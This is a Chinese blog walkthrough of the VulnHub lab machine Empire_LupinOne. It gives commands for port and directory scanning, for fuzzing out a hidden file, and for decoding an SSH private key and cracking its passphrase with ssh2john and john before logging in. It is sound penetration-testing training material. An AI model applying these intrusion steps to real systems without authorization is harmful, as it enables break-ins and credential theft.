首页 > 其他分享 >vulnhub靶场Empire_LupinOne

vulnhub靶场Empire_LupinOne

时间:2024-12-27 21:26:46浏览次数:7  
标签:192.168 解密 LupinOne vulnhub 146.155 Empire txt 靶机 usr

一、部署靶机

靶机设置为nat模式

开启靶机 直接暴露靶机ip

二、信息收集

扫ip

访问靶机地址

扫目录
dirb http://192.168.146.155
dirsearch -u http://192.168.146.155

扫端口
nmap -sS -A -T4 192.168.146.155 //对靶机开放的端口进行更详细的扫描
nmap -sC -sV -p 22,80 192.168.146.155 -oN nmap.log  //扫端口和目录
masscan -p 1-65535 192.168.146.155

指纹收集

whatweb -v 192.168.146.155

三、渗透攻击

访问robots.txt 发现文件夹~myfiles 但无法直接访问 要进行模糊测试

ffuf -c -w /usr/share/wordlists/dirb/co  //太慢了!!!不要用了
wfuzz -u 'http://192.168.146.155/~FUZZ' -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404  //秒出!!!

扫到一个 secret

解密

得到一封信重要的有:1.存在隐藏文件 2.用fasttrack字典爆破密码 3.用户名icex64

ffuf -u 'http://192.168.47.133/~secret/.FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub,.html,.bak -mc 200

直接去访问一下这个文件mysecret.txt

去解密一下

base64解密不出来;base58可以;这就是登录系统的私钥

创建两个文档;2.txt写我们解密后的数据;1.txt空的

我们可以利用kali自带的ssh2john进行密码的暴力破解

把我们解密后的数据写到1.txt

ssh2john 2.txt > 1.txt
john --wordlist=/usr/share/wordlists/fasttrack.txt 1.txt
得到密码P@55w0rd!
用户名:icex64
密码:P@55w0rd!

登录系统

#如果出现报错//报错的原因是Linux和Windows的换行符不一致
chmod 600 key	#提升权限
dos2unix key	#改变格式
#在连接
ssh icex64@192.168.47.133 -i key

成功获取flag

标签:192.168,解密,LupinOne,vulnhub,146.155,Empire,txt,靶机,usr
From: https://blog.csdn.net/qq_54694921/article/details/144777636

相关文章

  • Vulnhub-SolidState打靶
    目录一、nmap扫描二、pop3泄露的ssh密码登录ssh,并rbash逃逸三、root权限脚本反弹shell提权四、总结一、nmap扫描nmap-sT--min-rate10000192.168.213.141 -oAnmapscan/port扫描tcp开放了那些端口,保存到nmap/port中nmap-sU --min-rate10000192.168.213.141......
  • 「玩转 Vulnhub:Kioptrix 5 靶机的渗透与解题思路」
    获取靶机地址:点击领取获取更多资料工具:点击领取信息收集主机发现首先我们要找到靶机的ip,先用kali扫一圈同网段存活的ip,再将靶机打开,然后接着再扫一遍sudo arp-scan -l端口扫描下一步是收集有关靶机上运行的服务的信息。sudo nmap -p- -A 192.168.17.129发......
  • Vulnhub 靶场 N00b: 1
    先下载靶机靶机地址:https://www.vulnhub.com/entry/noob-1,746/收集信息1.发现靶机IP首先查看kaili的IP靶机要和kali在同一模式下(NAT)靶机ip arp-scan--interface=eth0--localnet 这里也是找到了IP2.端口扫描 nmap -sS-sV-T4-A-p-192.168.239.9......
  • Vulnhub 靶场 Jetty: 1
    前期准备靶机地址:https://www.vulnhub.com/entry/jetty-1,621/DescriptionBacktotheTopThecompanyAquariumLifeS.L.hascontactedyoutoperformapentestagainstoneoftheirmachines.Theysuspectthatoneoftheiremployeeshasbeencommittingfraudsel......
  • Vulnhub 靶场 DevGuru: 1
    前期准备靶机地址:https://www.vulnhub.com/entry/devguru-1,620/kali攻击机IP:192.168.11.128靶机IP:192.168.11.130一、信息收集1.使用nmap对目标靶机进行扫描开了22、80、8585端口。发现git目录,且提示做解析:192.168.11.130devguru.local2.80端口发现用的是Octo......
  • Vulnhub nxy
    0x01:端口扫描主机发现nmap-sn10.10.10.0/24全端口扫描nmap--min-rate10000-p-10.10.10.132UDP扫描nmap-sU--top=2010.10.10.132详细端口扫描nmap-sT-sC-sV-O--min-rate10000-p22,8010.10.10.132漏洞扫描nmap--script=vuln-p22,8010.10.10.1......
  • 日常打靶Vulnhub靶场之Ubuntu_CTF过程记录
    靶场环境靶机:VirtualBox虚拟机主机(IP:192.168.56.17),网卡类型Host_only测试机:kalilinux(IP:192.168.56.3),网卡类型Host_only端口扫描nmap对靶机端口扫描,发现只开放了80、3306和33060三个端口。nmap-sT--min-rate10000-p-192.168.56.17继续对端口进行详细信息扫......
  • Vulnhub--FristiLeaks_1.3 脏牛提权
    个人博客WuTongSec打点nmap192.168.128.0/24--min-rate10000nmap192.168.128.138-P--min-rate10000nikto-hhttp://192.168.128.138/【oscp考试官方文档里面说可以用这个工具】dirsearch-uhttp://192.168.128.138有的时候robots.txt也会泄露一些敏感的......
  • Tr0ll: 1 Vulnhub靶机渗透笔记
    Tr0ll:1Vulnhub靶机渗透笔记本博客提供的所有信息仅供学习和研究目的,旨在提高读者的网络安全意识和技术能力。请在合法合规的前提下使用本文中提供的任何技术、方法或工具。如果您选择使用本博客中的任何信息进行非法活动,您将独自承担全部法律责任。本博客明确表示不支持、不鼓......
  • Vulnhub Mercury
    0x01:端口扫描nmap-sn10.10.10.0/24全端口扫描nmap--min-rate10000-p-10.10.10.129UDP扫描nmap-sU--top=2010.10.10.129详细端口扫描nmap-sT-sC-sV-O--min-rate10000-p22,808010.10.10.129漏洞扫描nmap--script=vuln-p22,808010.10.10.1290......